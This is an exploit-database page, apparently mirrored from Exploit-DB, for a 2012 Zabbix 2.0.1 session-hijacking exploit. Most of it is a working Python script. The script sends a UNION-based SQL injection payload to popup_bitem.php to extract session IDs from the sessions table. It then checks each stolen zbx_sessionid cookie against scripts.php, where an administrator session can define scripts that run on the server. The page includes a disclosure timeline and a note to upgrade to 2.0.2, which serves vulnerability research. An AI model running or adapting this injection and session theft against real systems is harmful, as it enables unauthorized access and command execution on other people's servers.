header-logo
Suggest Exploit
vendor:
Zabbix
by:
Offensive Security
7,5
CVSS
HIGH
Session Hijacking
287
CWE
Product Name: Zabbix
Affected Version From: 2.0.1
Affected Version To: 2.0.1
Patch Exists: YES
Related CWE: N/A
CPE: a:zabbix:zabbix:2.0.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012

Zabbix 2.0.1 Session Extractor 0day

This exploit allows an attacker to extract valid sessions from the Zabbix 2.0.1 web interface. Through this web interface, an administrator can define new malicious scripts which can then be called from the maps area and executed with 'zabbix' permissions.

Mitigation:

Upgrade to Zabbix 2.0.2 or later.
Source

Exploit-DB raw data:

#!/usr/bin/python

import re
import sys,urllib2,urllib

print "\n[*] Zabbix 2.0.1 Session Extractor 0day"
print "[*] http://www.offensive-security.com"
print "##################################\n"

''' 

The sessions found by this tool may allow you to access the scripts.php file.
Through this web interface, an administrator can define new malicious scripts. 
These scripts can then be called from the maps area, and executed with "zabbix" permissions.

Timeline:

17 Jul 2012: Vulnerabilty reported
17 Jul 2012: Reply received
18 Jul 2012: Issue opened: https://support.zabbix.com/browse/ZBX-5348
19 Jul 2012: Fixed for inclusion in version 2.0.2

'''

ip="172.16.164.150"

target = 'http://%s/zabbix/popup_bitem.php' % ip
url = 'http://%s/zabbix/scripts.php' % ip

def sendSql(num):
        global target
        payload="1)) union select 1,group_concat(sessionid) from sessions where userid='%s'#" % num
        payload="1 union select 1,1,1,1,1,group_concat(sessionid),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from sessions where userid='%s'#" % num
        values = {'dstfrm':'1','itemid':payload }
        url = "%s?%s" % (target, urllib.urlencode(values))  
        req = urllib2.Request(url)                          
        response = urllib2.urlopen(req)                 
        data = response.read()                  
        return data

def normal(cookie):
	global url
        req = urllib2.Request(url)
        cook = "zbx_sessionid=%s" %cookie
        req.add_header('Cookie', cook)
        response = urllib2.urlopen(req)                 
        data = response.read()                  
        if re.search('ERROR: Session terminated, re-login, please',data) or re.search('You are not logged in',data) or re.search('ERROR: No Permissions',data):
                return "FAIL"
        else:
                return "SUCCESS"

sessions=[]

for m in range(1,2):
	print "[*] Searching sessions belonging to id %s" % m
        hola=sendSql(m)
        for l in re.findall(r"([a-fA-F\d]{32})", hola):
		if l not in sessions:
			sessions.append(l)
	                print "[*] Found sessionid %s - %s" % (l,normal(l))

Navigation

Suggest Exploit

Services By CQR